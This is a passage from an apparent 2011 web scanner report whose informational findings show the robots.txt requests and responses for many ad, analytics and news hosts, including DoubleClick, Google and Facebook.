Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

22.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1883211998
Date: Mon, 09 May 2011 15:36:03 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

22.18. http://data.usatoday.net/apps/InsidePage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1660
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

22.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 09 May 2011 15:39:06 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

22.20. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 15:35:40 GMT
Server: Floodlight server
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.21. http://gannett.gcion.com/addyn/3.0/5111.1/809057/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/809057/0/-1/ADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

22.22. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030881291/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1030881291/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 15:35:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.23. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /_common/_scripts/_community/lib/usl.photo.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1660
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

22.24. http://jqueryui.com/ui/jquery.ui.widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /ui/jquery.ui.widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jqueryui.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:43:16 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 02 Nov 2010 19:49:40 GMT
ETag: "3f98028-27-4941739b27d00"
Accept-Ranges: bytes
Content-Length: 39
X-Served-By: www3
X-Proxy: 2

User-agent: *
Disallow: /repository/

22.25. http://l.addthiscdn.com/live/t00/250lo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 11:47:15 GMT
ETag: "de0256-1b-4a052abaf56c0"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 09 May 2011 15:35:19 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

22.26. http://login.npr.org/openid/embed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.npr.org
Path:   /openid/embed

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.npr.org

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/plain
Content-Length: 172
Last-Modified: Thu, 05 May 2011 01:50:05 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Accept-Ranges: bytes

User-agent: *
Disallow: /api/
Disallow: /rp/api/
Disallow: /openid/
Disallow: /stylesheets/
Disallow: /examples/
Disallow: /images/
Sitemap: https://rpxnow.com/sitemap.xml

22.27. http://map.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 09 May 2011 15:35:20 GMT
Connection: close

# go away
User-agent: *
Disallow: /

22.28. http://metrics.csmonitor.com/b/ss/fcocscsm/1/H.21/s92332599295768

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /b/ss/fcocscsm/1/H.21/s92332599295768

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.csmonitor.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:21 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "351114-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www24
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.29. http://metrics.npr.org/b/ss/nprorg/1/H.17/s91303597942460

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /b/ss/nprorg/1/H.17/s91303597942460

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "21c3a7-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www400
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.30. http://mobile.fox8live.com/BlackBerry/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /BlackBerry/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mobile.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/plain
Last-Modified: Fri, 11 Sep 2009 22:46:10 GMT
Accept-Ranges: bytes
ETag: "06517a83133ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:46 GMT
Connection: close
Content-Length: 93

User-agent: *
Disallow:/ScriptResource.axd
Disallow:/WebResource.axd
Sitemap:/sitemap.ashx

22.31. http://pagead2.googlesyndication.com/pagead/imgad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 15:35:03 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.32. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:35:02 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 09 May 2011 15:35:02 GMT
Server: QS

User-agent: *
Disallow: /

22.33. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 15:35:01 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.34. http://s0.2mdn.net/dot.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /dot.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 08 May 2011 20:35:09 GMT
Expires: Thu, 05 May 2011 20:30:09 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 68396
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /

22.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYg4cDIIyHAyoFh8MAAD8yBYPDAAAP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYg4cDIIyHAyoFh8MAAD8yBYPDAAAP

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:40:05 GMT
Expires: Mon, 09 May 2011 15:40:05 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.36. http://safebrowsing.clients.google.com/safebrowsing/gethash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:36:58 GMT
Expires: Mon, 09 May 2011 15:36:58 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.37. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:35:40 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.38. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /PointRoll/Ads/PRScript.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:12d1"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:56 GMT
Connection: close

User-agent: *
Disallow: /

22.39. http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:35:10 GMT
Connection: close

User-agent: *
Disallow: /

22.40. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Mon, 09 May 2011 15:35:53 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.41. http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stp.fox8live.com
Path:   /common/pagereporting/nettracker/ntpagetag.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stp.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/plain
Last-Modified: Fri, 11 Sep 2009 22:46:10 GMT
Accept-Ranges: bytes
ETag: "06517a83133ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close
Content-Length: 93

User-agent: *
Disallow:/ScriptResource.axd
Disallow:/WebResource.axd
Sitemap:/sitemap.ashx

22.42. http://t.pointroll.com/PointRoll/Track/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /PointRoll/Track/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:430"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:40:00 GMT
Connection: close

User-agent: *
Disallow: /

22.43. http://toolbarqueries.clients.google.com/tbproxy/af/query

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:38:06 GMT
Expires: Mon, 09 May 2011 15:38:06 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.44. http://trc.taboolasyndication.com/usatoday/log/2/available

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/available

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 May 2011 19:45:52 GMT
ETag: "f404d9-41-4a25045625c00"
Accept-Ranges: bytes
Content-Length: 65
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

User-agent: Adsbot-Google
Disallow: /

22.45. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s97032880377955

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s97032880377955

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:51 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "36a0e5-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www419
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.46. http://va.px.invitemedia.com/adnxs_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /adnxs_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.47. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/550/0/vj

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: w10.localadbuy.com

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:36:59 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Wed, 08 Dec 2010 22:05:23 GMT

User-agent: *
Disallow: /

22.48. http://widgets.macroaxis.com/widgets/content.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.macroaxis.com
Path:   /widgets/content.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.macroaxis.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Last-Modified: Thu, 19 Feb 2009 05:18:45 GMT
ETag: "2a981a7-5b-4633eab9a9740"
Accept-Ranges: bytes
Content-Length: 91
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /deployment
Allow: /
Sitemap: http://www.macroaxis.com/sitemap.xml

22.49. http://www.collegesurfing.com/searchbox-mge-us.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /searchbox-mge-us.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegesurfing.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 05 Mar 2010 17:48:41 GMT
ETag: "193817e-ac-48111536e3040"
Accept-Ranges: bytes
Content-Length: 172
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerwww.collegesurfing.com=671219722.20480.0000; path=/

User-agent: *

Disallow: /blank/
Disallow: /canada/
Disallow: /ce/search/results.php
Disallow: /ce/thankyou/
Disallow: /help/
Disallow: /help-center/
Disallow: /js/

22.50. http://www.csmonitor.com/Business

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csmonitor.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Fri, 19 Feb 2010 15:46:40 GMT
Served-By:
Content-Type: text/plain
Cache-Control: max-age=83857
Expires: Tue, 10 May 2011 14:52:31 GMT
Date: Mon, 09 May 2011 15:34:54 GMT
Content-Length: 2969
Connection: close

User-agent: Mediapartners-Google*
Disallow: /includes/
Disallow: /keepalive.html

User-agent: *
Disallow: /sudoku
Disallow: /404
Disallow: /Innovation/Horizons/2009/1123/which-best-buy-black-friday-sa
...[SNIP]...

22.51. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.43.33
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.52. http://www.fox8live.com/business/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fox8live.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n18), ms iad-agg-n18 ( origin)
ETag: "06517a83133ca1:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:55 GMT
Age: 0
Content-Length: 93
Content-Type: text/plain
Last-Modified: Fri, 11 Sep 2009 22:46:10 GMT
Connection: close

User-agent: *
Disallow:/ScriptResource.axd
Disallow:/WebResource.axd
Sitemap:/sitemap.ashx

22.53. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 09 May 2011 15:35:44 GMT
Expires: Mon, 09 May 2011 15:35:44 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

22.54. http://www.google.com/finance/chart

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance/chart

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:37:57 GMT
Expires: Mon, 09 May 2011 15:37:57 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.55. http://www.googleadservices.com/pagead/conversion/1030881291/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1030881291/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Expires: Mon, 09 May 2011 15:35:23 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.56. http://www.groupon.com/subscriptions/new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/plain
Accept-Ranges: bytes
Age: 106268
Date: Mon, 09 May 2011 15:35:34 GMT
Last-Modified: Thu, 28 Apr 2011 20:34:00 GMT
Content-Length: 544
Connection: close

sitemap: http://groupon.s3.amazonaws.com/sitemaps/sitemap_index.xml.gz
User-agent: *
Disallow: /deals/update_deal_status
Disallow: /*/community
Disallow: /deals/*/confirmation
Disallow: /deals/*/membe
...[SNIP]...

22.57. https://www.groupon.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/plain
Connection: close
Accept-Ranges: bytes
Age: 64809
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 25

User-agent: *
Disallow: /

22.58. http://www.macroaxis.com/widgets/url.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.macroaxis.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Last-Modified: Thu, 19 Feb 2009 05:18:45 GMT
ETag: "2c854f-5b-4633eab9a9740"
Accept-Ranges: bytes
Content-Length: 91
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /deployment
Allow: /
Sitemap: http://www.macroaxis.com/sitemap.xml

22.59. http://www.meebo.com/cmd/getrotate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/getrotate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
